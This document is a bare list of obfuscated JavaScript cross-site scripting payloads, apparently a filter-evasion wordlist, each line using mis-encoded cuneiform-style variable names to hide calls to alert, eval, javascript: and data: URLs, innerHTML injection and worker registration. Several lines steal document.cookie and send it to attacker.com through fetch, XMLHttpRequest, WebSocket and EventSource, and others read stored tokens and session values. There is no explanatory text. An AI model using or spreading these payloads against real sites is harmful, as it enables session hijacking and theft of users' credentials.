ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],ğ’€Œ=ğ’€[3],ğ’€=ğ’€ƒ[1],ğ’€=ğ’€ƒ[5],ğ’€=ğ’€ƒ[6],ğ’€=(ğ’€‚+ğ’€ƒ)[10],[][ğ’€+ğ’€+ğ’€+ğ’€‡+ğ’€‰+ğ’€Š+ğ’€‹+ğ’€+ğ’€‰+ğ’€+ğ’€Š][ğ’€+ğ’€+ğ’€+ğ’€‡+ğ’€‰+ğ’€Š+ğ’€‹+ğ’€+ğ’€‰+ğ’€+ğ’€Š]('alert(1)')()
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],ğ’€Œ=ğ’€[3],ğ’€=ğ’€ƒ[1],ğ’€=ğ’€ƒ[5],ğ’€=ğ’€ƒ[6],ğ’€=(ğ’€‚+ğ’€ƒ)[10],[][ğ’€+ğ’€+ğ’€+ğ’€‡+ğ’€‰+ğ’€Š+ğ’€‹+ğ’€+ğ’€‰+ğ’€+ğ’€Š][ğ’€+ğ’€+ğ’€+ğ’€‡+ğ’€‰+ğ’€Š+ğ’€‹+ğ’€+ğ’€‰+ğ’€+ğ’€Š]('alert(document.domain)')()
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],ğ’€Œ=ğ’€[3],ğ’€=ğ’€ƒ[1],ğ’€=ğ’€ƒ[5],ğ’€=ğ’€ƒ[6],ğ’€=(ğ’€‚+ğ’€ƒ)[10],[][ğ’€+ğ’€+ğ’€+ğ’€‡+ğ’€‰+ğ’€Š+ğ’€‹+ğ’€+ğ’€‰+ğ’€+ğ’€Š][ğ’€+ğ’€+ğ’€+ğ’€‡+ğ’€‰+ğ’€Š+ğ’€‹+ğ’€+ğ’€‰+ğ’€+ğ’€Š]('prompt(1)')()
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],ğ’€Œ=ğ’€[3],ğ’€=ğ’€ƒ[1],ğ’€=ğ’€ƒ[5],ğ’€=ğ’€ƒ[6],ğ’€=(ğ’€‚+ğ’€ƒ)[10],[][ğ’€+ğ’€+ğ’€+ğ’€‡+ğ’€‰+ğ’€Š+ğ’€‹+ğ’€+ğ’€‰+ğ’€+ğ’€Š][ğ’€+ğ’€+ğ’€+ğ’€‡+ğ’€‰+ğ’€Š+ğ’€‹+ğ’€+ğ’€‰+ğ’€+ğ’€Š]('confirm(1)')()
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],ğ’€Œ=ğ’€[3],ğ’€=ğ’€ƒ[1],ğ’€=ğ’€ƒ[5],ğ’€=ğ’€ƒ[6],ğ’€=(ğ’€‚+ğ’€ƒ)[10],[][ğ’€+ğ’€+ğ’€+ğ’€‡+ğ’€‰+ğ’€Š+ğ’€‹+ğ’€+ğ’€‰+ğ’€+ğ’€Š][ğ’€+ğ’€+ğ’€+ğ’€‡+ğ’€‰+ğ’€Š+ğ’€‹+ğ’€+ğ’€‰+ğ’€+ğ’€Š]('eval("alert(1)")')()
%F0%92%80%80%3D%27%27%2C%F0%92%80%81%3D%21%F0%92%80%80%2B%27%27%2C%F0%92%80%82%3D%21%21%F0%92%80%80%2B%27%27%2C%F0%92%80%83%3D%7B%7D%2B%27%27%2C%F0%92%80%84%3D%F0%92%80%82%5B0%5D%2C%F0%92%80%85%3D%F0%92%80%82%5B1%5D%2C%F0%92%80%86%3D%F0%92%80%82%5B2%5D%2C%F0%92%80%87%3D%F0%92%80%82%5B3%5D%2C%F0%92%80%88%3D%F0%92%80%82%5B4%5D%2C%F0%92%80%89%3D%F0%92%80%81%5B0%5D%2C%F0%92%80%8A%3D%F0%92%80%81%5B1%5D%2C%F0%92%80%8B%3D%F0%92%80%81%5B2%5D%2C%F0%92%80%8C%3D%F0%92%80%81%5B3%5D%2C%F0%92%80%8D%3D%F0%92%80%83%5B1%5D%2C%F0%92%80%8E%3D%F0%92%80%83%5B5%5D%2C%5B%5D%5B%F0%92%80%8E%2B%F0%92%80%8D%2B%28%F0%92%80%82%2B%F0%92%80%83%29%5B10%5D%2B%F0%92%80%87%2B%F0%92%80%89%2B%F0%92%80%8A%2B%F0%92%80%8B%2B%F0%92%80%8E%2B%F0%92%80%89%2B%F0%92%80%8D%2B%F0%92%80%8A%5D%5B%F0%92%80%8E%2B%F0%92%80%8D%2B%28%F0%92%80%82%2B%F0%92%80%83%29%5B10%5D%2B%F0%92%80%87%2B%F0%92%80%89%2B%F0%92%80%8A%2B%F0%92%80%8B%2B%F0%92%80%8E%2B%F0%92%80%89%2B%F0%92%80%8D%2B%F0%92%80%8A%5D%28%27alert%281%29%27%29%28%29
ğ’€='',ğ’=!ğ’€+'',ğ’‚=!!ğ’€+'',ğ’ƒ={}+'',ğ’„=ğ’‚[0],ğ’…=ğ’‚[1],ğ’†=ğ’‚[2],ğ’‡=ğ’‚[3],ğ’ˆ=ğ’‚[4],ğ’‰=ğ’[0],ğ’Š=ğ’[1],ğ’‹=ğ’[2],ğ’Œ=ğ’[3],ğ’=ğ’ƒ[1],ğ’=ğ’ƒ[5],ğ’=ğ’ƒ[6],ğ’=(ğ’‚+ğ’ƒ)[10],[][ğ’+ğ’+ğ’+ğ’‡+ğ’‰+ğ’Š+ğ’‹+ğ’+ğ’‰+ğ’+ğ’Š][ğ’+ğ’+ğ’+ğ’‡+ğ’‰+ğ’Š+ğ’‹+ğ’+ğ’‰+ğ’+ğ’Š]('alert(1)')()
ğ’‚€='',ğ’‚=!ğ’‚€+'',ğ’‚‚=!!ğ’‚€+'',ğ’‚ƒ={}+'',ğ’‚„=ğ’‚‚[0],ğ’‚…=ğ’‚‚[1],ğ’‚†=ğ’‚‚[2],ğ’‚‡=ğ’‚‚[3],ğ’‚ˆ=ğ’‚‚[4],ğ’‚‰=ğ’‚[0],ğ’‚Š=ğ’‚[1],ğ’‚‹=ğ’‚[2],ğ’‚Œ=ğ’‚[3],ğ’‚=ğ’‚ƒ[1],ğ’‚=ğ’‚ƒ[5],ğ’‚=ğ’‚ƒ[6],ğ’‚=(ğ’‚‚+ğ’‚ƒ)[10],[][ğ’‚+ğ’‚+ğ’‚+ğ’‚‡+ğ’‚‰+ğ’‚Š+ğ’‚‹+ğ’‚+ğ’‚‰+ğ’‚+ğ’‚Š][ğ’‚+ğ’‚+ğ’‚+ğ’‚‡+ğ’‚‰+ğ’‚Š+ğ’‚‹+ğ’‚+ğ’‚‰+ğ’‚+ğ’‚Š]('alert(1)')()
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],eval(ğ’€ˆ+ğ’€‹+ğ’€Š+ğ’€„+ğ’€ƒ[1]+ğ’€[0]+'(1)')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],ğ’€Œ=ğ’€[3],ğ’€=ğ’€ƒ[1],ğ’€=ğ’€ƒ[5],window[ğ’€…+ğ’€†+ğ’€„+ğ’€Š+ğ’€‰](1)
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.write('<script>alert(1)</script>')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],location='javascript:alert(1)'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],setTimeout('alert(1)',1)
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],setInterval('alert(1)',1000)
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],parent.postMessage('alert(1)','*')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.body.innerHTML='<img src=x onerror=alert(1)>'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.body.outerHTML='<img src=x onerror=alert(1)>'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.body.insertAdjacentHTML('beforeend','<img src=x onerror=alert(1)>')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.createAttribute('onload').value='alert(1)'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],location.href='javascript:alert(document.domain)'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],alert(document.cookie)
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],alert(localStorage.getItem('token'))
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],alert(sessionStorage.getItem('session'))
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],fetch('https://attacker.com/'+document.cookie)
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],x=new XMLHttpRequest();x.open('GET','https://attacker.com/'+document.cookie);x.send()
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],ws=new WebSocket('ws://attacker.com');ws.send(document.cookie)
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],es=new EventSource('https://attacker.com/'+document.cookie)
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],import('data:text/javascript,alert(1)')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],w=new Worker('data:text/javascript,alert(1)');w.postMessage('')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],sw=new SharedWorker('data:text/javascript,alert(1)')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],navigator.serviceWorker.register('data:text/javascript,alert(1)')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.head.innerHTML='<style>body{background:url(javascript:alert(1))}</style>'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.body.innerHTML='<svg><script>alert(1)</script></svg>'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.body.innerHTML='<math><script>alert(1)</script></math>'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],location='data:text/html,<script>alert(1)</script>'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],eval(atob('YWxlcnQoMSk='))
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],eval(unescape('%61%6c%65%72%74%28%31%29'))
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],eval(decodeURI('%61%6c%65%72%74%28%31%29'))
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],eval(decodeURIComponent('%61%6c%65%72%74%28%31%29'))
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],eval(String.fromCharCode(97,108,101,114,116,40,49,41))
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],s=document.createElement('script');s.src='data:text/javascript,alert(1)';document.head.appendChild(s)
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],s=document.createElement('script');s.appendChild(document.createTextNode('alert(1)'));document.head.appendChild(s)
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],w=window.open('javascript:alert(1)','','width=1,height=1')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.showModalDialog('javascript:alert(1)')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.execScript('alert(1)')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],history.pushState({},'','javascript:alert(1)')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],location.replace('javascript:alert(1)')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],location.assign('javascript:alert(1)')
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],location.reload();alert(1)
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],location.hash='javascript:alert(1)'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],location.search='?q=<script>alert(1)</script>'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.name='<script>alert(1)</script>'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.status='<script>alert(1)</script>'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.defaultStatus='<script>alert(1)</script>'
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.onerror=alert;throw 1
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.onload=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.onunload=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.onbeforeunload=function(){alert(1)}
